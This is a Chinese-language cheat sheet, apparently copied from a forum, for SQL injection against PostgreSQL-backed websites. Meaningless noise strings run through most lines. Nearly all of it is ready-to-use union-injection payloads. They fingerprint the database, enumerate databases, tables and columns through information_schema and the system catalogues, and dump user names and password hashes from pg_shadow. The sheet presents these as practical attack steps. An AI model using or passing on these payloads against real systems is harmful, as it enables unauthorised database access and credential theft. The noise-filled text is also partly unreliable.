结合了MSSQL MySQL Oracle的一些特点4 D, u# v3 S2 E `
支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/9 `' A6 ~' r! e' r( L/ ~
连接符: %20 , + , /**/ 内置函数:, B: C+ L" y! p: P
current_database() //当前数据库名7 k$ R% c; ^' y" u- O/ x8 q9 G
session_user //会话用户
1 J H6 k# z1 ]1 j4 Dcurrent_user //当前数据库用户
k+ J, T5 U5 {- Huser //当前用户
1 z, y9 O8 d: sversion() //数据库版本 Union注射:
, J+ {+ K4 O* q: torder by n–
8 I& v5 k7 h8 N( v8 Z# Vand 1=2 union select null,null,null–" ~9 j8 R' K2 `2 w' `- s
and 1=2 union select ‘beach’,null,null–. K6 W- S$ y5 H3 h1 E; ]
and 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):
7 Q- [: a9 Y0 {) r4 E4 a6 Ggroup_concat(table_name)
( [. b6 A4 ~. b; D0 _0 Eand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–6 s0 ?& g& U4 Q7 ^( D# g% n0 [
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
6 r H/ Q U. T* {9 O0 V# u8 ?(老版本)2 H2 O9 b, t7 O$ A. w( S
pg_class.oid对应pg_attribute.attrelid
) D: q! z, w- T: ?pg_class.relname表名
8 l$ c3 M0 `$ M+ upg_attribute.attname字段名 select relname from pg_class获取表名6 c" ]5 B& ~2 a; p
select oid from pg_class where 条件 获取参数2 Q$ m7 n. ?8 R8 R7 y/ Z
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:
6 b! y2 _# M, C" iand 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表! e7 J1 k1 J$ Z! t0 n( a1 G
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
0 C5 A* ~3 i6 @+ D7 I2 ~2 \+ Z由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名6 U# ]$ a( B8 p5 @4 R5 d
======================================================================2 H2 r4 u3 T, p, Q9 D
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
5 v; }+ D' t3 W) g% cand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |